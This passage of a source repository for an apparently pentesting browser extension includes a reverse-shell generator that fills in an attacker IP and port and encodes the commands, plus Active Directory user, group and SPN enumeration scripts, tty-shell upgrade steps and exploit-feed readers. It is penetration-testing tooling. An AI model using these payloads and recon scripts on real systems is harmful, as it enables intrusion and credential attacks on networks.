\"ResetPassword\"`;\n\n // dump user accounts \n const local_recon_ldifde = `ldifde -d \"OU=THING,DC=CHANGE,DC=ME\" -p subtree -f dump.ldf`\n const local_recon_csvde = `csvde -d \"OU=THING,DC=CHANGE,DC=ME\" -p subtree -f dump.csv`\n\n // Enumerate Domain Users\n const domain_user_enum = `$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n$PDC = ($domainObj.PdcRoleOwner).Name\n$SearchString = \"LDAP://\"\n$SearchString += $PDC + \"/\"\n$DistinguishedName = \"DC=$($domainObj.Name.Replace('.', ',DC='))\"\n$SearchString += $DistinguishedName\n$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n$objDomain = New-Object System.DirectoryServices.DirectoryEntry\n$Searcher.SearchRoot = $objDomain\n$Searcher.filter=\"samAccountType=805306368\"\n\n# To search for specific user, uncomment below\n# $Searcher.filter=\"name=[user_name]\"\n\n$Searcher.FindAll()\nForeach($obj in $Result)\n{\n Foreach($prop in $obj.Properties)\n {\n $prop\n }\n Write-Host \"------------------------\"\n}`;\n const enum_domain_groups = `$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n$PDC = ($domainObj.PdcRoleOwner).Name\n$SearchString = \"LDAP://\"\n$SearchString += $PDC + \"/\"\n$DistinguishedName = \"DC=$($domainObj.Name.Replace('.', ',DC='))\"\n$SearchString += $DistinguishedName\n$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n$objDomain = New-Object System.DirectoryServices.DirectoryEntry\n$Searcher.SearchRoot = $objDomain\n$Searcher.filter=\"(objectClass=Group)\"\n$Result = $Searcher.FindAll()\nForeach($obj in $Result)\n{\n $obj.Properties.name\n}`;\n const enum_members_domain_group = `$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n$PDC = ($domainObj.PdcRoleOwner).Name\n$SearchString = \"LDAP://\"\n$SearchString += $PDC + \"/\"\n$DistinguishedName = \"DC=$($domainObj.Name.Replace('.', ',DC='))\"\n$SearchString += $DistinguishedName\n$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n$objDomain = New-Object System.DirectoryServices.DirectoryEntry\n$Searcher.SearchRoot = $objDomain\n\n# change \"Secret_Group\" to correct group name\n$Searcher.filter=\"(name=Secret_Group)\"\n$Result = $Searcher.FindAll()\nForeach($obj in $Result)\n{\n $obj.Properties.member\n}`\n const detect_spn = `$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n$PDC = ($domainObj.PdcRoleOwner).Name\n$SearchString = \"LDAP://\"\n$SearchString += $PDC + \"/\"\n$DistinguishedName = \"DC=$($domainObj.Name.Replace('.', ',DC='))\"\n$SearchString += $DistinguishedName\n$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n$objDomain = New-Object System.DirectoryServices.DirectoryEntry\n$Searcher.SearchRoot = $objDomain\n$Searcher.filter=\"serviceprincipalname=*http*\" # change name as needed\n$Result = $Searcher.FindAll()\nForeach($obj in $Result)\n{\n Foreach($prop in $obj.Properties)\n {\n $prop\n }\n}`;\n\n return (\n
\n \n Powershell handy commands\n \n List of useful Powershell commands\n \n \n System enumeration\n {local_sys_enum.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n List Security patches\n \n 
{lastpatchlist}
\n \n \n 
{lastpatchlist_wmic}
\n \n Environment Variables\n \n 
{envVar}
\n \n (over cmd.exe) \n \n 
{envVar_cmd}
\n \n HTTP download (wget like)\n \n 
{powershell_http_dl}
\n \n Cmd compatible\n \n 
{cmd_cert_http_dl}
\n \n WLAN enumeration\n {wlan_creddump.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n\n Active Directory enumeration\n \n Require Powerview.ps1\n \n 
{power_view_repo}
\n \n Domain enumeration\n \n 
{domain_name}
\n \n\n List Forest Domains \n \n 
{forest_domain_list}
\n \n\n Domain SID \n \n 
{domain_SID}
\n \n\n Domain Policy \n \n 
{domain_Policy}
\n \n\n Domain Organizational Units \n \n 
{domain_OUs}
\n \n\n List trusted Domains\n \n 
{domain_trust}
\n \n\n GPO enumeration\n\n GPO applied to the machine\n \n 
{gpo_enum}
\n \n\n Password enumeration\n\n Last Password Set date\n \n 
{passwd_lastset}
\n \n Description of User object \n \n 
{user_desc_harvest}
\n \n Computer enumeration\n\n List Computers of the Domain\n \n 
{domain_computers}
\n \n List Pingable Hosts \n \n 
{domain_pingable_computers}
\n \n List Windows 7 Ultimate Computers \n \n 
{domain_win7U_computers}
\n \n\n Admin groups and account enumeration\n\n List Domain Admin members\n \n 
{domain_admin_members}
\n \n List Admin Groups \n \n 
{domain_admins_groups}
\n \n List Local Admins [need Administrative rights] \n \n 
{local_admins}
\n \n\n Get groups of user [need Administrative rights] \n \n 
{user_group_membership}
\n \n\n ACL enumeration\n\n User ACL \n \n 
{ACL_user_enum}
\n \n\n GPO modifications rights\n \n 
{ACL_gpoedit_rights}
\n \n\n Password reset rights\n \n 
{ACL_passwd_edit_rights}
\n \n\n Local reconnaissance\n Export user accounts with ldifde\n \n 
{local_recon_ldifde}
\n \n Export user accounts with csvde\n \n 
{local_recon_csvde}
\n \n\n Active Directory scripts\n Enumerate Domain Users\n
\n \n {domain_user_enum}\n \n \n \n \n Copy\n \n \n
\n Enumerate Domain Groups\n
\n \n {enum_domain_groups}\n \n \n \n \n Copy\n \n \n
\n Enumerate Members of a Group\n
\n \n {enum_members_domain_group}\n \n \n \n \n Copy\n \n \n
\n Detect Service Principal Names\n
\n \n {detect_spn}\n \n \n \n \n Copy\n \n \n
\n \n \n );\n}\n" }, { "path": "src/components/linux/ReverseShell.tsx", "content": "import React, { useRef, useState } from 'react';\r\nimport { message, Typography, Row, Col, Input, Table, Tag, Select, Form, InputRef, Button, Space, Dropdown } from 'antd';\r\nimport type { ColumnsType, TableProps } from 'antd/es/table';\r\nimport { SearchOutlined, WifiOutlined, createFromIconfontCN } from '@ant-design/icons';\r\nimport PersistedState from 'use-persisted-state';\r\nimport { Ipv4TcpCacheState } from 'components/types/Ipv4TcpCacheState';\r\nimport { ColumnType, FilterConfirmProps, FilterValue, SorterResult } from 'antd/es/table/interface';\r\nimport Highlighter from 'react-highlight-words';\r\n\r\nconst { Title, Paragraph, Text } = Typography;\r\nconst IconFont = createFromIconfontCN( {\r\n scriptUrl: [ './iconfont.js' ]\r\n} );\r\n\r\ninterface DataType {\r\n key: React.Key;\r\n name: string;\r\n tags: string[];\r\n command: string;\r\n}\r\n\r\ntype DataIndex = keyof DataType;\r\n\r\n\r\nexport default function ReverseShell () {\r\n const useIPv4State = PersistedState( 'ipv4_tcp_cache' );\r\n const [ searchText, setSearchText ] = useState( '' );\r\n const [ searchedColumn, setSearchedColumn ] = useState( '' );\r\n const searchInput = useRef( null );\r\n\r\n const [ values, setValues ] = useIPv4State( {\r\n ip: '',\r\n port: '',\r\n shell: '/bin/sh',\r\n } );\r\n\r\n const [ messageApi, contextHolder ] = message.useMessage();\r\n const info = () => {\r\n messageApi.success( 'Your reverse shell has been copied to the clipboard!' );\r\n };\r\n\r\n const items = [\r\n {\r\n key: '1',\r\n label: 'Base64 Encoded',\r\n },\r\n {\r\n key: '2',\r\n label: 'URL Encoded',\r\n },\r\n {\r\n key: '3',\r\n label: 'Double URL Encoded',\r\n },\r\n ];\r\n\r\n const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {\r\n setValues( { ...values, [ name ]: event.target.value } );\r\n };\r\n\r\n const handleChangeSelect = ( prop: string ) => ( data: any ) => {\r\n setValues( { ...values, [ prop ]: data } );\r\n };\r\n\r\n const [ filteredInfo, setFilteredInfo ] = useState>( {} );\r\n const [ sortedInfo, setSortedInfo ] = useState>( {} );\r\n const handleChangeFilter: TableProps[ 'onChange' ] = ( _, filters, sorter ) => {\r\n setFilteredInfo( filters );\r\n setSortedInfo( sorter as SorterResult );\r\n };\r\n\r\n const handleSearch = (\r\n selectedKeys: string[],\r\n confirm: ( param?: FilterConfirmProps ) => void,\r\n dataIndex: DataIndex,\r\n ) => {\r\n confirm();\r\n setSearchText( selectedKeys[ 0 ] );\r\n setSearchedColumn( dataIndex );\r\n };\r\n\r\n const handleReset = ( clearFilters: () => void ) => {\r\n clearFilters();\r\n setSearchText( '' );\r\n };\r\n\r\n const getColumnSearchProps = ( dataIndex: DataIndex ): ColumnType => ( {\r\n filterDropdown: ( { setSelectedKeys, selectedKeys, confirm, clearFilters, close } ) => (\r\n
e.stopPropagation()}>\r\n setSelectedKeys( e.target.value ? [ e.target.value ] : [] )}\r\n onPressEnter={() => handleSearch( selectedKeys as string[], confirm, dataIndex )}\r\n style={{ marginBottom: 8, display: 'block' }}\r\n />\r\n \r\n handleSearch( selectedKeys as string[], confirm, dataIndex )}\r\n icon={}\r\n size=\"small\"\r\n style={{ width: 90 }}\r\n >\r\n Search\r\n \r\n clearFilters && handleReset( clearFilters )}\r\n size=\"small\"\r\n style={{ width: 90 }}\r\n >\r\n Reset\r\n \r\n {\r\n confirm( { closeDropdown: false } );\r\n setSearchText( ( selectedKeys as string[] )[ 0 ] );\r\n setSearchedColumn( dataIndex );\r\n }}\r\n >\r\n Filter\r\n \r\n {\r\n close();\r\n }}\r\n >\r\n Close\r\n \r\n \r\n
\r\n ),\r\n filterIcon: ( filtered: boolean ) => (\r\n \r\n ),\r\n onFilter: ( value, record ) =>\r\n record[ dataIndex ]\r\n .toString()\r\n .toLowerCase()\r\n .includes( ( value as string ).toLowerCase() ),\r\n onFilterDropdownVisibleChange: ( visible: any ) => {\r\n if ( visible ) {\r\n setTimeout( () => {\r\n searchInput.current?.select();\r\n }, 100 );\r\n } else {\r\n setSearchedColumn( \"\" );\r\n }\r\n },\r\n render: ( text ) =>\r\n searchedColumn === dataIndex ? (\r\n \r\n ) : (\r\n text\r\n ),\r\n } );\r\n\r\n\r\n const columns: ColumnsType = [\r\n {\r\n title: 'Name', dataIndex: 'name', key: 'name', filteredValue: filteredInfo.name || null,\r\n onFilter: ( value: string, record ) => record.name.includes( value ),\r\n sorter: ( a, b ) => a.name.length - b.name.length,\r\n ...getColumnSearchProps( 'name' ),\r\n sortOrder: sortedInfo.columnKey === 'name' ? sortedInfo.order : null,\r\n ellipsis: true,\r\n },\r\n {\r\n title: 'Tags',\r\n dataIndex: 'tags',\r\n key: 'tags',\r\n render: ( _, { tags } ) => (\r\n <>\r\n {tags.map( ( tag ) => {\r\n switch ( tag ) {\r\n case 'linux':\r\n return {tag.toUpperCase()};\r\n case 'mac':\r\n return {tag.toUpperCase()};\r\n case 'windows':\r\n return {tag.toUpperCase()};\r\n default:\r\n return {tag.toUpperCase()};\r\n }\r\n } )}\r\n \r\n ),\r\n filters: [\r\n { text: 'Linux', value: 'linux' },\r\n { text: 'macOS', value: 'mac' },\r\n { text: 'Windows', value: 'windows' },\r\n ],\r\n filteredValue: filteredInfo.tags || null,\r\n onFilter: ( value: string, record ) => record.tags.includes( value ),\r\n sortOrder: sortedInfo.columnKey === 'tags' ? sortedInfo.order : null,\r\n ellipsis: true,\r\n },\r\n {\r\n title: 'Action',\r\n dataIndex: 'action',\r\n key: 'action',\r\n render: ( _, { command } ) => (\r\n <>\r\n {\r\n switch ( e.key ) {\r\n case '1':\r\n // base64 encoded\r\n info()\r\n navigator.clipboard.writeText( btoa( command ) );\r\n break;\r\n case '2':\r\n // url encoded\r\n info()\r\n navigator.clipboard.writeText( encodeURIComponent( command ) );\r\n break;\r\n case '3':\r\n // double url encoded\r\n info()\r\n navigator.clipboard.writeText( encodeURIComponent( encodeURIComponent( command ) ) );\r\n break;\r\n default:\r\n info()\r\n break;\r\n }\r\n },\r\n }}\r\n onClick={() => { info(); navigator.clipboard.writeText( command ); }}\r\n >\r\n Copy\r\n \r\n \r\n ),\r\n },\r\n ];\r\n\r\n let payloads = require( '../../assets/data/RevShell.json' );\r\n\r\n const data: DataType[] = payloads.map( ( payload: any ) => ( {\r\n key: payload.id,\r\n name: payload.name,\r\n tags: payload.tags,\r\n command: payload.command,\r\n } ) );\r\n\r\n data.forEach( ( payload ) => {\r\n if ( payload.command ) {\r\n payload.command = payload.command.replace( /\\${values.ip}/g, String( values.ip ) );\r\n payload.command = payload.command.replace( /\\${values.port}/g, String( values.port ) );\r\n payload.command = payload.command.replace( /\\{shell}/g, String( values.shell ) );\r\n }\r\n } );\r\n\r\n return (\r\n
\r\n {contextHolder}\r\n
\r\n \r\n Reverse shell\r\n \r\n \r\n A reverse shell is a type of network communication in which a connection is established from a remote host (the \"attacker\") to a target host (the \"victim\") and the attacker is able to execute commands on the victim's machine as if they were running on the attacker's machine. This is typically done by exploiting a vulnerability in the victim's system or by tricking the victim into running a malicious program that establishes the reverse shell.\r\n \r\n
\r\n \r\n \r\n }\r\n name='Ip adress'\r\n placeholder='IP Address or domain (ex: 212.212.111.222)'\r\n onChange={handleChange( 'ip' )}\r\n value={values.ip}\r\n />\r\n \r\n \r\n }\r\n name='Port'\r\n placeholder='Port (ex: 1337)'\r\n onChange={handleChange( 'port' )}\r\n value={values.port}\r\n />\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n
\r\n (\r\n \r\n 
\r\n                                    \r\n                                        {record.command}\r\n                                    \r\n
\r\n \r\n ),\r\n rowExpandable: ( record ) => record.name !== 'Not Expandable',\r\n }}\r\n dataSource={data}\r\n onChange={values.ip && values.port && values.shell ? handleChangeFilter : undefined}\r\n />\r\n
\r\n
\r\n );\r\n}\r\n" }, { "path": "src/components/linux/TtySpawnShell.tsx", "content": "import React from 'react';\nimport { Typography, Divider, Space } from 'antd';\n\nconst { Title, Paragraph, Text } = Typography;\n\nexport default function TTY () {\n return (\n
\n \n TTY Spawn Shell\n \n \n Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the\n system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will\n depend on the system environment and installed packages.\n \n \n \n \n All the steps to stabilize your shell\n \n The first step:\n 
\n                            \n                                python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\n                            \n
\n Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit\n prettier, but we still won’t be able to use tab autocomplete or the arrow keys.\n \n \n Step two is:\n 
\n                            \n                                export TERM=xterm\n                            \n
\n This will give us access to term commands such as clear.\n \n \n Finally (and most importantly) we will background the shell using\n 
\n                            \n                                Ctrl + Z\n                            \n
\n Back in our own terminal we use\n 
\n                            \n                                stty raw -echo; fg\n                            \n
\n This does two things: first, it turns off our own terminal echo which gives us access to tab\n autocompletes, the arrow keys, and Ctrl + C to kill processes\n 
\n                            \n                                stty rows 38 columns 116\n                            \n
\n \n \n
\n \n );\n}\n" }, { "path": "src/components/notepad/Notepad.tsx", "content": "import React from 'react';\nimport MDEditor from '@uiw/react-md-editor';\nimport PersistedState from 'use-persisted-state';\n\n\nconst NOTEPAD = () => {\n const [ value, setValue ] = PersistedState( 'notepad' )( '' );\n return (\n
\n \n
\n );\n\n};\n\nexport default NOTEPAD;\n" }, { "path": "src/components/rss/BugsCX.tsx", "content": "import React from 'react';\nimport { Typography, Empty, Spin, Button, List, Tag } from 'antd';\nimport { PageHeader } from '@ant-design/pro-layout';\nimport { goTo } from 'react-chrome-extension-router';\nimport { useQuery } from 'react-query';\nimport CxsecurityChoose from './CxsecurityChoose';\n\nconst { Title } = Typography;\n\nconst fetchApi = async () => {\n const res = await fetch(\n 'https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Fcxsecurity.com%2Fwlb%2Frss%2Fvulnerabilities%2F&api_key=cpe1hekkfknhpeqov1hvcojojd9csg01yqybwsaw&count=100'\n );\n return res.json();\n};\n\nexport default function BugsCX () {\n const { data, status } = useQuery( 'cisco', fetchApi );\n\n interface IBugsCX {\n content: any;\n title: string;\n link: string;\n author: string;\n }\n\n return (\n
\n goTo( CxsecurityChoose )}\n title='Vulnerabilities Database'\n subTitle='World Laboratory of Bugtraq 2 CXSecurity.com'\n />\n {status === 'loading' && (\n
\n \n \n
\n )}\n {status === 'error' && (\n \n Error getting the data please contact us.}\n >\n \n \n \n )}\n {status === 'success' && (\n \n \n Recent Vulnerabilities\n \n (\n \n {( () => {\n const severityLevel = list.content.match( /Risk: (\\w{1,})/ );\n if ( !severityLevel ) {\n return 'None';\n } else {\n switch ( severityLevel[ 1 ] ) {\n case 'High':\n return {severityLevel[ 1 ]};\n case 'Medium':\n return {severityLevel[ 1 ]};\n case 'Low':\n return {severityLevel[ 1 ]};\n default:\n return 'None';\n }\n }\n } )()}\n
,\n \n {list.author}\n \n ]}\n >\n \n {list.title}\n \n \n )}\n />\n \n )}\n \n );\n}\n" }, { "path": "src/components/rss/CVESearch.tsx", "content": "import React, { useState } from 'react';\nimport { Typography, Empty, Spin, Button, Tag, Descriptions, Input, List, Divider, Result } from 'antd';\nimport { PageHeader } from '@ant-design/pro-layout';\nimport { CloseCircleOutlined } from '@ant-design/icons';\nimport { goTo } from 'react-chrome-extension-router';\nimport { useQuery } from 'react-query';\nimport FeedRSS from './FeedRSS';\n\nconst { Paragraph, Title, Text } = Typography;\nconst { Search } = Input;\n\nexport default function CVESearch () {\n const [ values, setValues ] = useState( {\n cve: 'CVE-2017-0146'\n } );\n const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {\n setValues( { ...values, [ name ]: event.target.value } );\n };\n const fetchApi = async () => {\n const res = await fetch( `https://corsproxy.io/?https://cve.circl.lu/api/cve/${ values.cve }` );\n return res.json();\n };\n const { isLoading, isError, data, refetch, isFetching } = useQuery( 'cve', fetchApi );\n\n if ( isLoading ) {\n return (\n
\n \n
\n );\n }\n if ( isError ) {\n return (\n
\n Error getting the data please contact us.}\n >\n \n \n
\n );\n }\n\n return (\n
\n goTo( FeedRSS )}\n title='CVE Search engine'\n extra={[\n \n ]}\n />\n refetch()}\n onSearch={() => refetch()}\n />\n {data != null ? (\n
\n \n \n \n \n {data.Published.slice(\n data.Published.indexOf( '20' ),\n data.Published.lastIndexOf( '0' ) - 8\n )}\n \n \n \n \n {data.Modified.slice(\n data.Modified.indexOf( '20' ),\n data.Modified.lastIndexOf( '0' ) - 8\n )}\n \n \n \n {( () => {\n if ( data.cvss >= 0.1 && data.cvss <= 3.9 )\n return {data.cvss};\n if ( data.cvss >= 4.0 && data.cvss <= 6.9 )\n return {data.cvss};\n if ( data.cvss >= 7.0 && data.cvss <= 10 )\n return {data.cvss};\n } )()}\n \n \n {data.id}\n \n \n {( () => {\n if ( data.cvss >= 0.1 && data.cvss <= 3.9 )\n return (\n \n LOW\n \n );\n if ( data.cvss >= 4.0 && data.cvss <= 6.9 )\n return (\n \n MEDIUM\n \n );\n if ( data.cvss >= 7.0 && data.cvss <= 8.9 )\n return (\n \n HIGH\n \n );\n if ( data.cvss >= 9.0 && data.cvss <= 10 )\n return (\n \n CRITICAL\n \n );\n } )()}\n \n {data.access.vector}\n \n \n {data.summary}\n \n
\n \n \n References / Documentation\n (\n \n \n {list}\n \n \n )}\n />\n
\n \n ) : (\n \n
\n \n \n The content you submitted has the following error:\n \n \n \n The value that you submitted{' '}\n does not exist.\n \n \n The{' '}\n API is in maintenance, please try again.\n \n
\n \n )}\n
\n {isFetching ? (\n
\n \n
\n ) : null}\n
\n \n );\n}\n" }, { "path": "src/components/rss/Cisco.tsx", "content": "import React from 'react';\nimport { Typography, Empty, Spin, Button, List, Tag } from 'antd';\nimport { PageHeader } from '@ant-design/pro-layout';\nimport { goTo } from 'react-chrome-extension-router';\nimport { useQuery } from 'react-query';\nimport FeedRSS from './FeedRSS';\n\nconst { Title } = Typography;\n\nconst fetchApi = async () => {\n const res = await fetch(\n 'https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Ftools.cisco.com%2Fsecurity%2Fcenter%2Fpsirtrss20%2FCiscoSecurityAdvisory.xml&api_key=spbf63tt7rvx2r0wh2x6yoz00ssjyztpceqqkdj3&count=20'\n );\n return res.json();\n};\n\nexport default function Cisco () {\n const { data, status } = useQuery( 'cisco', fetchApi );\n\n interface ICisco {\n content: any;\n link: string;\n title: string;\n }\n\n return (\n
\n goTo( FeedRSS )}\n title='Feed RSS'\n subTitle='Cisco Security Advisories'\n extra={[\n \n ]}\n />\n {status === 'loading' && (\n
\n \n \n
\n )}\n {status === 'error' && (\n
\n Error getting the data please contact us.}\n >\n \n \n
\n )}\n {status === 'success' && (\n \n \n Recent exploit\n \n (\n \n {( () => {\n const severityLevel = list.content.match( /( )[a-zA-Z]+/ )[ 0 ];\n switch ( severityLevel ) {\n case ' Critical':\n return {severityLevel};\n case ' High':\n return {severityLevel};\n case ' Medium':\n return {severityLevel};\n case ' Low':\n return {severityLevel};\n case ' Informational':\n return {severityLevel};\n default:\n return 'None';\n }\n } )()}\n
,\n \n {( () => {\n const cveMatch = list.content.match( /CVE-(\\d{4})-(\\d{4,5})/ );\n if ( !cveMatch ) {\n return 'None';\n } else {\n return cveMatch[ 0 ];\n }\n } )()}\n \n ]}\n >\n \n {list.title}\n \n \n )}\n />\n \n )}\n \n );\n}\n" }, { "path": "src/components/rss/CxsecurityChoose.tsx", "content": "import React from 'react';\nimport { Typography, Card, Col, Row, Button } from 'antd';\nimport { PageHeader } from '@ant-design/pro-layout';\nimport { goTo } from 'react-chrome-extension-router';\nimport { GithubOutlined } from '@ant-design/icons';\nimport FeedRSS from './FeedRSS';\nimport ExploitCX from './ExploitCX';\nimport BugsCX from './BugsCX';\nimport DorksCX from './DorksCX';\n\nconst { Paragraph } = Typography;\nconst { Meta } = Card;\n\nexport default function CxsecurityChoose () {\n return (\n
\n goTo( FeedRSS )}\n title='CX Security Independent RSS'\n extra={[\n \n ]}\n />\n \n \n goTo( BugsCX )}\n style={{\n cursor: 'pointer',\n boxShadow:\n '0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)'\n }}\n cover={\n \n }\n >\n \n \n \n \n goTo( ExploitCX )}\n style={{\n cursor: 'pointer',\n boxShadow:\n '0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)'\n }}\n cover={\n \n }\n >\n \n \n \n \n goTo( DorksCX )}\n style={{\n cursor: 'pointer',\n boxShadow:\n '0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)'\n }}\n cover={\n \n }\n >\n \n \n \n \n
\n You have a suggestion about the feed ?\n \n
\n
\n );\n}\n" }, { "path": "src/components/rss/DorksCX.tsx", "content": "import React from 'react';\nimport { Typography, Empty, Spin, Button, List, Tag } from 'antd';\nimport { PageHeader } from '@ant-design/pro-layout';\nimport { goTo } from 'react-chrome-extension-router';\nimport { useQuery } from 'react-query';\nimport CxsecurityChoose from './CxsecurityChoose';\n\nconst { Title } = Typography;\n\nconst fetchApi = async () => {\n const res = await fetch(\n 'https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Fcxsecurity.com%2Fwlb%2Frss%2Fdorks%2F&api_key=cpe1hekkfknhpeqov1hvcojojd9csg01yqybwsaw&count=100'\n );\n return res.json();\n};\n\nexport default function DorksCX () {\n const { data, status } = useQuery( 'cisco', fetchApi );\n\n interface IDorksCX {\n title: string;\n link: string;\n author: string;\n }\n\n return (\n
\n goTo( CxsecurityChoose )}\n title='Vulnerabilities Database'\n subTitle='World Laboratory of Bugtraq 2 CXSecurity.com'\n />\n {status === 'loading' && (\n
\n \n \n
\n )}\n {status === 'error' && (\n \n Error getting the data please contact us.}\n >\n \n \n \n )}\n {status === 'success' && (\n \n \n Recent Dorks\n \n (\n \n {!list.author ? 'None' : list.author}\n \n ]}\n >\n \n {list.title}\n \n \n )}\n />\n
\n )}\n \n );\n}\n" }, { "path": "src/components/rss/ExploitCX.tsx", "content": "import React from 'react';\nimport { Typography, Empty, Spin, Button, List, Tag } from 'antd';\nimport { PageHeader } from '@ant-design/pro-layout';\nimport { goTo } from 'react-chrome-extension-router';\nimport { useQuery } from 'react-query';\nimport CxsecurityChoose from './CxsecurityChoose';\n\nconst { Title } = Typography;\n\nconst fetchApi = async () => {\n const res = await fetch(\n 'https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Fcxsecurity.com%2Fwlb%2Frss%2Fexploit%2F&api_key=cpe1hekkfknhpeqov1hvcojojd9csg01yqybwsaw&count=100'\n );\n return res.json();\n};\n\nexport default function ExploitCX () {\n const { data, status } = useQuery( 'cisco', fetchApi );\n\n interface IExploitCX {\n content: any;\n author: string;\n link: string;\n title: string;\n pubDate: string;\n guid: string;\n }\n\n return (\n
\n goTo( CxsecurityChoose )}\n title='Exploit Database'\n subTitle='World Laboratory of Bugtraq 2 CXSecurity.com'\n />\n {\n status === 'loading' && (\n
\n \n \n
\n )\n }\n {\n status === 'error' && (\n \n Error getting the data please contact us.}\n >\n \n \n \n )\n }\n {\n status === 'success' && (\n \n \n Recent Exploit\n \n (\n \n {( () => {\n const severityLevel = list.content.match( /Risk: (\\w{1,})/ )[ 1 ];\n switch ( severityLevel ) {\n case 'High':\n return {severityLevel};\n case 'Medium':\n return {severityLevel};\n case 'Low':\n return {severityLevel};\n default:\n return 'None';\n }\n } )()}\n
,\n \n {list.author}\n \n ]}\n >\n \n {list.title}\n \n \n )}\n />\n \n )\n }\n \n );\n}\n" }, { "path": "src/components/rss/ExploitDB.tsx", "content": "import React from 'react';\nimport { Typography, Empty, Spin, Button, List, Tag } from 'antd';\nimport { PageHeader } from '@ant-design/pro-layout';\nimport { goTo } from 'react-chrome-extension-router';\nimport { useQuery } from 'react-query';\nimport FeedRSS from './FeedRSS';\n\nconst { Title } = Typography;\n\nconst fetchApi = async () => {\n const res = await fetch(\n 'https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Fwww.exploit-db.com%2Frss.xml&api_key=spbf63tt7rvx2r0wh2x6yoz00ssjyztpceqqkdj3&order_dir=desc&count=100'\n );\n return res.json();\n};\n\nexport default function ExploitDB () {\n const { data, status, } = useQuery( 'exploitdb', fetchApi );\n\n interface IExploitDB {\n title: any;\n link: string;\n pubDate: string;\n description: string;\n }\n\n return (\n
\n goTo( FeedRSS )}\n title='Feed RSS'\n subTitle='Exploit-DB.com RSS Feed'\n extra={[\n \n ]}\n />\n {status === 'loading' && (\n
\n \n \n
\n )}\n {status === 'error' && (\n
\n Error getting the data please contact us.}\n >\n \n \n
\n )}\n {status === 'success' && (\n \n \n Recent exploit\n \n (\n \n {( () => {\n const name_tag = list.title.match( /[a-zA-Z]+/ )[ 0 ] ?? \"\";\n switch ( name_tag ) {\n case 'webapps':\n return {name_tag};\n case 'local':\n return {name_tag};\n case 'dos':\n return {name_tag};\n case 'remote':\n return {name_tag};\n default:\n return 'None';\n }\n } )()}\n
,\n \n {list.pubDate.slice(\n list.pubDate.indexOf( '20' ),\n list.pubDate.lastIndexOf( '0' ) - 8\n )}\n \n ]}\n >\n \n {list.description}\n \n \n )}\n />\n \n )}\n \n );\n}\n" }, { "path": "src/components/rss/FeedRSS.tsx", "content": "import React from 'react';\nimport { Typography, Card, Col, Row, Avatar, Tooltip, Button } from 'antd';\nimport { goTo } from 'react-chrome-extension-router';\nimport { LinkOutlined, EyeOutlined, GithubOutlined } from '@ant-design/icons';\nimport ExploitDB from './ExploitDB';\nimport Cisco from './Cisco';\nimport cve from './CVESearch';\nimport cxsecurity_choose from './CxsecurityChoose';\n\nconst { Title, Paragraph } = Typography;\nconst { Meta } = Card;\n\nexport default function FeedRSS () {\n return (\n
\n \n Exploit Feed RSS\n \n \n Feed about > Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability\n Reports, Security Articles, Tutorials and more.\n \n \n \n goTo( ExploitDB )}\n style={{\n cursor: 'pointer',\n boxShadow:\n '0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)'\n }}\n cover={exploit-db_website_homepage}\n actions={[\n \n goTo( ExploitDB )} />\n ,\n \n \n \n \n \n ]}\n >\n }\n title='ExploitDB'\n description='Exploit Database Vulnerabilities'\n />\n \n \n \n goTo( Cisco )}\n style={{\n cursor: 'pointer',\n boxShadow:\n '0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)'\n }}\n cover={cisco_image_logo}\n actions={[\n \n goTo( Cisco )} />\n ,\n \n \n \n \n \n ]}\n >\n \n }\n title='Cisco'\n description='Cisco Security Advisories'\n />\n \n \n \n goTo( cve )}\n style={{\n cursor: 'pointer',\n boxShadow:\n '0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)'\n }}\n cover={cve_image_logo}\n actions={[\n \n goTo( cve )} />\n ,\n \n \n \n \n \n ]}\n >\n \n }\n title='CVE'\n description='CVE Search engine'\n />\n \n \n \n goTo( cxsecurity_choose )}\n style={{\n cursor: 'pointer',\n boxShadow:\n '0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 